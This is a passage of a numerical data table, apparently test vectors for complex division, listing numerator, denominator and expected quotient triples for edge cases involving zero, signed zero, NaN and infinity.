{complex(zero, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, -zero), complex(zero, zero), complex(nan, nan)}, {complex(zero, -zero), complex(zero, -zero), complex(nan, nan)}, {complex(zero, -zero), complex(zero, 1), complex(zero, -zero)}, {complex(zero, -zero), complex(zero, -1), complex(zero, -zero)}, {complex(zero, -zero), complex(zero, 2), complex(zero, -zero)}, {complex(zero, -zero), complex(nan, nan), complex(nan, nan)}, {complex(zero, -zero), complex(nan, inf), complex(-zero, zero)}, {complex(zero, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(zero, -zero), complex(zero, zero), complex(nan, nan)}, {complex(zero, -zero), complex(-zero, -zero), complex(nan, nan)}, {complex(zero, -zero), complex(zero, 1), complex(zero, -zero)}, {complex(zero, -zero), complex(-zero, -1), complex(-zero, zero)}, {complex(zero, -zero), complex(zero, 2), complex(zero, -zero)}, {complex(zero, -zero), complex(nan, nan), complex(nan, nan)}, {complex(zero, -zero), complex(nan, inf), complex(-zero, zero)}, {complex(zero, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(zero, -zero), complex(1, zero), complex(zero, -zero)}, {complex(zero, -zero), complex(1, -zero), complex(zero, zero)}, {complex(zero, -zero), complex(1, 1), complex(zero, -zero)}, {complex(zero, -zero), complex(1, -1), complex(zero, zero)}, {complex(zero, -zero), complex(1, 2), complex(zero, -zero)}, {complex(zero, -zero), complex(nan, nan), complex(nan, nan)}, {complex(zero, -zero), complex(nan, inf), complex(-zero, zero)}, {complex(zero, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(zero, -zero), complex(-1, zero), complex(-zero, -zero)}, {complex(zero, -zero), complex(-1, -zero), complex(-zero, zero)}, {complex(zero, -zero), complex(-1, 1), complex(-zero, -zero)}, {complex(zero, -zero), complex(-1, -1), complex(-zero, zero)}, {complex(zero, -zero), complex(-1, 2), complex(-zero, zero)}, {complex(zero, -zero), complex(nan, nan), complex(nan, nan)}, {complex(zero, -zero), complex(nan, inf), complex(-zero, zero)}, {complex(zero, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(zero, -zero), complex(2, zero), complex(zero, -zero)}, {complex(zero, -zero), complex(2, -zero), complex(zero, zero)}, {complex(zero, -zero), complex(2, 1), complex(zero, -zero)}, {complex(zero, -zero), complex(2, -1), complex(zero, zero)}, {complex(zero, -zero), complex(2, 2), complex(zero, -zero)}, {complex(zero, -zero), complex(nan, nan), complex(nan, nan)}, {complex(zero, -zero), complex(nan, inf), complex(-zero, zero)}, {complex(zero, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(zero, -zero), complex(nan, zero), complex(nan, nan)}, {complex(zero, -zero), complex(nan, -zero), complex(nan, nan)}, {complex(zero, -zero), complex(nan, 1), complex(nan, nan)}, {complex(zero, -zero), complex(nan, -1), complex(nan, nan)}, {complex(zero, -zero), complex(nan, 2), complex(nan, nan)}, {complex(zero, -zero), complex(nan, nan), complex(nan, nan)}, {complex(zero, -zero), complex(nan, inf), complex(-zero, zero)}, {complex(zero, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(zero, -zero), complex(inf, zero), complex(zero, -zero)}, {complex(zero, -zero), complex(inf, -zero), complex(zero, zero)}, {complex(zero, -zero), complex(inf, 1), complex(zero, -zero)}, {complex(zero, -zero), complex(inf, -1), complex(zero, zero)}, {complex(zero, -zero), complex(inf, 2), complex(zero, -zero)}, {complex(zero, -zero), complex(nan, nan), complex(nan, nan)}, {complex(zero, -zero), complex(nan, inf), complex(-zero, zero)}, {complex(zero, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(zero, -zero), complex(-inf, zero), complex(-zero, -zero)}, {complex(zero, -zero), complex(-inf, -zero), complex(-zero, zero)}, {complex(zero, -zero), complex(-inf, 1), complex(-zero, -zero)}, {complex(zero, -zero), complex(-inf, -1), complex(-zero, zero)}, {complex(zero, -zero), complex(-inf, 2), complex(-zero, -zero)}, {complex(zero, -zero), complex(nan, nan), complex(nan, nan)}, {complex(zero, -zero), complex(nan, inf), complex(-zero, zero)}, {complex(zero, -zero), complex(nan, -inf), complex(zero, zero)}, {complex(zero, 1), complex(zero, zero), complex(nan, inf)}, {complex(zero, 1), complex(zero, -zero), complex(nan, inf)}, {complex(zero, 1), complex(zero, 1), complex(1, zero)}, {complex(zero, 1), complex(zero, -1), complex(-1, zero)}, {complex(zero, 1), complex(zero, 2), complex(0.5, zero)}, {complex(zero, 1), complex(nan, nan), complex(nan, nan)}, {complex(zero, 1), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, 1), complex(zero, zero), complex(nan, inf)}, {complex(zero, 1), complex(-zero, -zero), complex(nan, -inf)}, {complex(zero, 1), complex(zero, 1), complex(1, zero)}, {complex(zero, 1), complex(-zero, -1), complex(-1, -zero)}, {complex(zero, 1), complex(zero, 2), complex(0.5, zero)}, {complex(zero, 1), complex(nan, nan), complex(nan, nan)}, {complex(zero, 1), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, 1), complex(1, zero), complex(zero, 1)}, {complex(zero, 1), complex(1, -zero), complex(zero, 1)}, {complex(zero, 1), complex(1, 1), complex(0.5, 0.5)}, {complex(zero, 1), complex(1, -1), complex(-0.5, 0.5)}, {complex(zero, 1), complex(1, 2), complex(0.4, 0.2)}, {complex(zero, 1), complex(nan, nan), complex(nan, nan)}, {complex(zero, 1), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, 1), complex(-1, zero), complex(-zero, -1)}, {complex(zero, 1), complex(-1, -zero), complex(-zero, -1)}, {complex(zero, 1), complex(-1, 1), complex(0.5, -0.5)}, {complex(zero, 1), complex(-1, -1), complex(-0.5, -0.5)}, {complex(zero, 1), complex(-1, 2), complex(0.4, -0.2)}, {complex(zero, 1), complex(nan, nan), complex(nan, nan)}, {complex(zero, 1), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, 1), complex(2, zero), complex(zero, 0.5)}, {complex(zero, 1), complex(2, -zero), complex(zero, 0.5)}, {complex(zero, 1), complex(2, 1), complex(0.2, 0.4)}, {complex(zero, 1), complex(2, -1), complex(-0.2, 0.4)}, {complex(zero, 1), complex(2, 2), complex(0.25, 0.25)}, {complex(zero, 1), complex(nan, nan), complex(nan, nan)}, {complex(zero, 1), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, 1), complex(nan, zero), complex(nan, nan)}, {complex(zero, 1), complex(nan, -zero), complex(nan, nan)}, {complex(zero, 1), complex(nan, 1), complex(nan, nan)}, {complex(zero, 1), complex(nan, -1), complex(nan, nan)}, {complex(zero, 1), complex(nan, 2), complex(nan, nan)}, {complex(zero, 1), complex(nan, nan), complex(nan, nan)}, {complex(zero, 1), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, 1), complex(inf, zero), complex(zero, zero)}, {complex(zero, 1), complex(inf, -zero), complex(zero, zero)}, {complex(zero, 1), complex(inf, 1), complex(zero, zero)}, {complex(zero, 1), complex(inf, -1), complex(zero, zero)}, {complex(zero, 1), complex(inf, 2), complex(zero, zero)}, {complex(zero, 1), complex(nan, nan), complex(nan, nan)}, {complex(zero, 1), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, 1), complex(-inf, zero), complex(-zero, -zero)}, {complex(zero, 1), complex(-inf, -zero), complex(-zero, -zero)}, {complex(zero, 1), complex(-inf, 1), complex(-zero, -zero)}, {complex(zero, 1), complex(-inf, -1), complex(-zero, -zero)}, {complex(zero, 1), complex(-inf, 2), complex(-zero, -zero)}, {complex(zero, 1), complex(nan, nan), complex(nan, nan)}, {complex(zero, 1), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 1), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, -1), complex(zero, zero), complex(nan, -inf)}, {complex(zero, -1), complex(zero, -zero), complex(nan, -inf)}, {complex(zero, -1), complex(zero, 1), complex(-1, -zero)}, {complex(zero, -1), complex(zero, -1), complex(1, -zero)}, {complex(zero, -1), complex(zero, 2), complex(-0.5, -zero)}, {complex(zero, -1), complex(nan, nan), complex(nan, nan)}, {complex(zero, -1), complex(nan, inf), complex(-zero, zero)}, {complex(zero, -1), complex(nan, -inf), complex(zero, zero)}, {complex(zero, -1), complex(zero, zero), complex(nan, -inf)}, {complex(zero, -1), complex(-zero, -zero), complex(nan, inf)}, {complex(zero, -1), complex(zero, 1), complex(-1, -zero)}, {complex(zero, -1), complex(-zero, -1), complex(1, zero)}, {complex(zero, -1), complex(zero, 2), complex(-0.5, -zero)}, {complex(zero, -1), complex(nan, nan), complex(nan, nan)}, {complex(zero, -1), complex(nan, inf), complex(-zero, zero)}, {complex(zero, -1), complex(nan, -inf), complex(zero, zero)}, {complex(zero, -1), complex(1, zero), complex(zero, -1)}, {complex(zero, -1), complex(1, -zero), complex(zero, -1)}, {complex(zero, -1), complex(1, 1), complex(-0.5, -0.5)}, {complex(zero, -1), complex(1, -1), complex(0.5, -0.5)}, {complex(zero, -1), complex(1, 2), complex(-0.4, -0.2)}, {complex(zero, -1), complex(nan, nan), complex(nan, nan)}, {complex(zero, -1), complex(nan, inf), complex(-zero, zero)}, {complex(zero, -1), complex(nan, -inf), complex(zero, zero)}, {complex(zero, -1), complex(-1, zero), complex(-zero, 1)}, {complex(zero, -1), complex(-1, -zero), complex(-zero, 1)}, {complex(zero, -1), complex(-1, 1), complex(-0.5, 0.5)}, {complex(zero, -1), complex(-1, -1), complex(0.5, 0.5)}, {complex(zero, -1), complex(-1, 2), complex(-0.4, 0.2)}, {complex(zero, -1), complex(nan, nan), complex(nan, nan)}, {complex(zero, -1), complex(nan, inf), complex(-zero, zero)}, {complex(zero, -1), complex(nan, -inf), complex(zero, zero)}, {complex(zero, -1), complex(2, zero), complex(zero, -0.5)}, {complex(zero, -1), complex(2, -zero), complex(zero, -0.5)}, {complex(zero, -1), complex(2, 1), complex(-0.2, -0.4)}, {complex(zero, -1), complex(2, -1), complex(0.2, -0.4)}, {complex(zero, -1), complex(2, 2), complex(-0.25, -0.25)}, {complex(zero, -1), complex(nan, nan), complex(nan, nan)}, {complex(zero, -1), complex(nan, inf), complex(-zero, zero)}, {complex(zero, -1), complex(nan, -inf), complex(zero, zero)}, {complex(zero, -1), complex(nan, zero), complex(nan, nan)}, {complex(zero, -1), complex(nan, -zero), complex(nan, nan)}, {complex(zero, -1), complex(nan, 1), complex(nan, nan)}, {complex(zero, -1), complex(nan, -1), complex(nan, nan)}, {complex(zero, -1), complex(nan, 2), complex(nan, nan)}, {complex(zero, -1), complex(nan, nan), complex(nan, nan)}, {complex(zero, -1), complex(nan, inf), complex(-zero, zero)}, {complex(zero, -1), complex(nan, -inf), complex(zero, zero)}, {complex(zero, -1), complex(inf, zero), complex(zero, -zero)}, {complex(zero, -1), complex(inf, -zero), complex(zero, -zero)}, {complex(zero, -1), complex(inf, 1), complex(zero, -zero)}, {complex(zero, -1), complex(inf, -1), complex(zero, -zero)}, {complex(zero, -1), complex(inf, 2), complex(zero, -zero)}, {complex(zero, -1), complex(nan, nan), complex(nan, nan)}, {complex(zero, -1), complex(nan, inf), complex(-zero, zero)}, {complex(zero, -1), complex(nan, -inf), complex(zero, zero)}, {complex(zero, -1), complex(-inf, zero), complex(-zero, zero)}, {complex(zero, -1), complex(-inf, -zero), complex(-zero, zero)}, {complex(zero, -1), complex(-inf, 1), complex(-zero, zero)}, {complex(zero, -1), complex(-inf, -1), complex(-zero, zero)}, {complex(zero, -1), complex(-inf, 2), complex(-zero, zero)}, {complex(zero, -1), complex(nan, nan), complex(nan, nan)}, {complex(zero, -1), complex(nan, inf), complex(-zero, zero)}, {complex(zero, -1), complex(nan, -inf), complex(zero, zero)}, {complex(zero, 2), complex(zero, zero), complex(nan, inf)}, {complex(zero, 2), complex(zero, -zero), complex(nan, inf)}, {complex(zero, 2), complex(zero, 1), complex(2, zero)}, {complex(zero, 2), complex(zero, -1), complex(-2, zero)}, {complex(zero, 2), complex(zero, 2), complex(1, zero)}, {complex(zero, 2), complex(nan, nan), complex(nan, nan)}, {complex(zero, 2), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, 2), complex(zero, zero), complex(nan, inf)}, {complex(zero, 2), complex(-zero, -zero), complex(nan, -inf)}, {complex(zero, 2), complex(zero, 1), complex(2, zero)}, {complex(zero, 2), complex(-zero, -1), complex(-2, -zero)}, {complex(zero, 2), complex(zero, 2), complex(1, zero)}, {complex(zero, 2), complex(nan, nan), complex(nan, nan)}, {complex(zero, 2), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, 2), complex(1, zero), complex(zero, 2)}, {complex(zero, 2), complex(1, -zero), complex(zero, 2)}, {complex(zero, 2), complex(1, 1), complex(1, 1)}, {complex(zero, 2), complex(1, -1), complex(-1, 1)}, {complex(zero, 2), complex(1, 2), complex(0.8, 0.4)}, {complex(zero, 2), complex(nan, nan), complex(nan, nan)}, {complex(zero, 2), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, 2), complex(-1, zero), complex(-zero, -2)}, {complex(zero, 2), complex(-1, -zero), complex(-zero, -2)}, {complex(zero, 2), complex(-1, 1), complex(1, -1)}, {complex(zero, 2), complex(-1, -1), complex(-1, -1)}, {complex(zero, 2), complex(-1, 2), complex(0.8, -0.4)}, {complex(zero, 2), complex(nan, nan), complex(nan, nan)}, {complex(zero, 2), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, 2), complex(2, zero), complex(zero, 1)}, {complex(zero, 2), complex(2, -zero), complex(zero, 1)}, {complex(zero, 2), complex(2, 1), complex(0.4, 0.8)}, {complex(zero, 2), complex(2, -1), complex(-0.4, 0.8)}, {complex(zero, 2), complex(2, 2), complex(0.5, 0.5)}, {complex(zero, 2), complex(nan, nan), complex(nan, nan)}, {complex(zero, 2), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, 2), complex(nan, zero), complex(nan, nan)}, {complex(zero, 2), complex(nan, -zero), complex(nan, nan)}, {complex(zero, 2), complex(nan, 1), complex(nan, nan)}, {complex(zero, 2), complex(nan, -1), complex(nan, nan)}, {complex(zero, 2), complex(nan, 2), complex(nan, nan)}, {complex(zero, 2), complex(nan, nan), complex(nan, nan)}, {complex(zero, 2), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, 2), complex(inf, zero), complex(zero, zero)}, {complex(zero, 2), complex(inf, -zero), complex(zero, zero)}, {complex(zero, 2), complex(inf, 1), complex(zero, zero)}, {complex(zero, 2), complex(inf, -1), complex(zero, zero)}, {complex(zero, 2), complex(inf, 2), complex(zero, zero)}, {complex(zero, 2), complex(nan, nan), complex(nan, nan)}, {complex(zero, 2), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, 2), complex(-inf, zero), complex(-zero, -zero)}, {complex(zero, 2), complex(-inf, -zero), complex(-zero, -zero)}, {complex(zero, 2), complex(-inf, 1), complex(-zero, -zero)}, {complex(zero, 2), complex(-inf, -1), complex(-zero, -zero)}, {complex(zero, 2), complex(-inf, 2), complex(-zero, -zero)}, {complex(zero, 2), complex(nan, nan), complex(nan, nan)}, {complex(zero, 2), complex(nan, inf), complex(zero, -zero)}, {complex(zero, 2), complex(nan, -inf), complex(-zero, zero)}, {complex(nan, nan), complex(zero, zero), complex(nan, nan)}, {complex(nan, nan), complex(zero, -zero), complex(nan, nan)}, {complex(nan, nan), complex(zero, 1), complex(nan, nan)}, {complex(nan, nan), complex(zero, -1), complex(nan, nan)}, {complex(nan, nan), complex(zero, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(zero, zero), complex(nan, nan)}, {complex(nan, nan), complex(-zero, -zero), complex(nan, nan)}, {complex(nan, nan), complex(zero, 1), complex(nan, nan)}, {complex(nan, nan), complex(-zero, -1), complex(nan, nan)}, {complex(nan, nan), complex(zero, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(1, zero), complex(nan, nan)}, {complex(nan, nan), complex(1, -zero), complex(nan, nan)}, {complex(nan, nan), complex(1, 1), complex(nan, nan)}, {complex(nan, nan), complex(1, -1), complex(nan, nan)}, {complex(nan, nan), complex(1, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(-1, zero), complex(nan, nan)}, {complex(nan, nan), complex(-1, -zero), complex(nan, nan)}, {complex(nan, nan), complex(-1, 1), complex(nan, nan)}, {complex(nan, nan), complex(-1, -1), complex(nan, nan)}, {complex(nan, nan), complex(-1, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(2, zero), complex(nan, nan)}, {complex(nan, nan), complex(2, -zero), complex(nan, nan)}, {complex(nan, nan), complex(2, 1), complex(nan, nan)}, {complex(nan, nan), complex(2, -1), complex(nan, nan)}, {complex(nan, nan), complex(2, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, zero), complex(nan, nan)}, {complex(nan, nan), complex(nan, -zero), complex(nan, nan)}, {complex(nan, nan), complex(nan, 1), complex(nan, nan)}, {complex(nan, nan), complex(nan, -1), complex(nan, nan)}, {complex(nan, nan), complex(nan, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(inf, zero), complex(nan, nan)}, {complex(nan, nan), complex(inf, -zero), complex(nan, nan)}, {complex(nan, nan), complex(inf, 1), complex(nan, nan)}, {complex(nan, nan), complex(inf, -1), complex(nan, nan)}, {complex(nan, nan), complex(inf, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, nan), complex(-inf, zero), complex(nan, nan)}, {complex(nan, nan), complex(-inf, -zero), complex(nan, nan)}, {complex(nan, nan), complex(-inf, 1), complex(nan, nan)}, {complex(nan, nan), complex(-inf, -1), complex(nan, nan)}, {complex(nan, nan), complex(-inf, 2), complex(nan, nan)}, {complex(nan, nan), complex(nan, nan), complex(nan, nan)}, {complex(nan, nan), complex(nan, inf), complex(nan, nan)}, {complex(nan, nan), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(zero, zero), complex(nan, inf)}, {complex(nan, inf), complex(zero, -zero), complex(nan, inf)}, {complex(nan, inf), complex(zero, 1), complex(inf, nan)}, {complex(nan, inf), complex(zero, -1), complex(-inf, nan)}, {complex(nan, inf), complex(zero, 2), complex(inf, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(zero, zero), complex(nan, inf)}, {complex(nan, inf), complex(-zero, -zero), complex(nan, -inf)}, {complex(nan, inf), complex(zero, 1), complex(inf, nan)}, {complex(nan, inf), complex(-zero, -1), complex(-inf, nan)}, {complex(nan, inf), complex(zero, 2), complex(inf, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(1, zero), complex(nan, inf)}, {complex(nan, inf), complex(1, -zero), complex(nan, inf)}, {complex(nan, inf), complex(1, 1), complex(inf, inf)}, {complex(nan, inf), complex(1, -1), complex(-inf, inf)}, {complex(nan, inf), complex(1, 2), complex(inf, inf)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(-1, zero), complex(nan, -inf)}, {complex(nan, inf), complex(-1, -zero), complex(nan, -inf)}, {complex(nan, inf), complex(-1, 1), complex(inf, -inf)}, {complex(nan, inf), complex(-1, -1), complex(-inf, -inf)}, {complex(nan, inf), complex(-1, 2), complex(inf, -inf)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(2, zero), complex(nan, inf)}, {complex(nan, inf), complex(2, -zero), complex(nan, inf)}, {complex(nan, inf), complex(2, 1), complex(inf, inf)}, {complex(nan, inf), complex(2, -1), complex(-inf, inf)}, {complex(nan, inf), complex(2, 2), complex(inf, inf)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, zero), complex(nan, nan)}, {complex(nan, inf), complex(nan, -zero), complex(nan, nan)}, {complex(nan, inf), complex(nan, 1), complex(nan, nan)}, {complex(nan, inf), complex(nan, -1), complex(nan, nan)}, {complex(nan, inf), complex(nan, 2), complex(nan, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(inf, zero), complex(nan, nan)}, {complex(nan, inf), complex(inf, -zero), complex(nan, nan)}, {complex(nan, inf), complex(inf, 1), complex(nan, nan)}, {complex(nan, inf), complex(inf, -1), complex(nan, nan)}, {complex(nan, inf), complex(inf, 2), complex(nan, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, inf), complex(-inf, zero), complex(nan, nan)}, {complex(nan, inf), complex(-inf, -zero), complex(nan, nan)}, {complex(nan, inf), complex(-inf, 1), complex(nan, nan)}, {complex(nan, inf), complex(-inf, -1), complex(nan, nan)}, {complex(nan, inf), complex(-inf, 2), complex(nan, nan)}, {complex(nan, inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(zero, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(zero, -zero), complex(nan, -inf)}, {complex(nan, -inf), complex(zero, 1), complex(-inf, nan)}, {complex(nan, -inf), complex(zero, -1), complex(inf, nan)}, {complex(nan, -inf), complex(zero, 2), complex(-inf, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(zero, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(-zero, -zero), complex(nan, inf)}, {complex(nan, -inf), complex(zero, 1), complex(-inf, nan)}, {complex(nan, -inf), complex(-zero, -1), complex(inf, nan)}, {complex(nan, -inf), complex(zero, 2), complex(-inf, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(1, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(1, -zero), complex(nan, -inf)}, {complex(nan, -inf), complex(1, 1), complex(-inf, -inf)}, {complex(nan, -inf), complex(1, -1), complex(inf, -inf)}, {complex(nan, -inf), complex(1, 2), complex(-inf, -inf)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(-1, zero), complex(nan, inf)}, {complex(nan, -inf), complex(-1, -zero), complex(nan, inf)}, {complex(nan, -inf), complex(-1, 1), complex(-inf, inf)}, {complex(nan, -inf), complex(-1, -1), complex(inf, inf)}, {complex(nan, -inf), complex(-1, 2), complex(-inf, inf)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(2, zero), complex(nan, -inf)}, {complex(nan, -inf), complex(2, -zero), complex(nan, -inf)}, {complex(nan, -inf), complex(2, 1), complex(-inf, -inf)}, {complex(nan, -inf), complex(2, -1), complex(inf, -inf)}, {complex(nan, -inf), complex(2, 2), complex(-inf, -inf)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, zero), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -zero), complex(nan, nan)}, {complex(nan, -inf), complex(nan, 1), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -1), complex(nan, nan)}, {complex(nan, -inf), complex(nan, 2), complex(nan, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(inf, zero), complex(nan, nan)}, {complex(nan, -inf), complex(inf, -zero), complex(nan, nan)}, {complex(nan, -inf), complex(inf, 1), complex(nan, nan)}, {complex(nan, -inf), complex(inf, -1), complex(nan, nan)}, {complex(nan, -inf), complex(inf, 2), complex(nan, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, zero), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, -zero), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, 1), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, -1), complex(nan, nan)}, {complex(nan, -inf), complex(-inf, 2), complex(nan, nan)}, {complex(nan, -inf), complex(nan, nan), complex(nan, nan)}, {complex(nan, -inf), complex(nan, inf), complex(nan, nan)}, {complex(nan, -inf), complex(nan, -inf), complex(nan, nan)}, {complex(zero, zero), complex(zero, zero), complex(nan, nan)}, {complex(zero, zero), complex(zero, -zero), complex(nan, nan)}, {complex(zero, zero), complex(zero, 1), complex(zero, zero)}, {complex(zero, zero), complex(zero, -1), complex(-zero, zero)}, {complex(zero, zero), complex(zero, 2), complex(zero, zero)}, {complex(zero, zero), complex(nan, nan), complex(nan, nan)}, {complex(zero, zero), complex(nan, inf), complex(zero, -zero)}, {complex(zero, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, zero), complex(zero, zero), complex(nan, nan)}, {complex(zero, zero), complex(-zero, -zero), complex(nan, nan)}, {complex(zero, zero), complex(zero, 1), complex(zero, zero)}, {complex(zero, zero), complex(-zero, -1), complex(-zero, -zero)}, {complex(zero, zero), complex(zero, 2), complex(zero, zero)}, {complex(zero, zero), complex(nan, nan), complex(nan, nan)}, {complex(zero, zero), complex(nan, inf), complex(zero, -zero)}, {complex(zero, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, zero), complex(1, zero), complex(zero, zero)}, {complex(zero, zero), complex(1, -zero), complex(zero, zero)}, {complex(zero, zero), complex(1, 1), complex(zero, zero)}, {complex(zero, zero), complex(1, -1), complex(zero, zero)}, {complex(zero, zero), complex(1, 2), complex(zero, zero)}, {complex(zero, zero), complex(nan, nan), complex(nan, nan)}, {complex(zero, zero), complex(nan, inf), complex(zero, -zero)}, {complex(zero, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, zero), complex(-1, zero), complex(-zero, -zero)}, {complex(zero, zero), complex(-1, -zero), complex(-zero, -zero)}, {complex(zero, zero), complex(-1, 1), complex(-zero, -zero)}, {complex(zero, zero), complex(-1, -1), complex(-zero, -zero)}, {complex(zero, zero), complex(-1, 2), complex(zero, -zero)}, {complex(zero, zero), complex(nan, nan), complex(nan, nan)}, {complex(zero, zero), complex(nan, inf), complex(zero, -zero)}, {complex(zero, zero), complex(nan, -inf), complex(-zero, zero)}, {complex(zero, zero), complex(2, zero), complex(zero, zero)}, {complex(zero, zero), complex(2, -zero), complex(zero, zero)}, {complex(zero, zero), complex(2, 1), 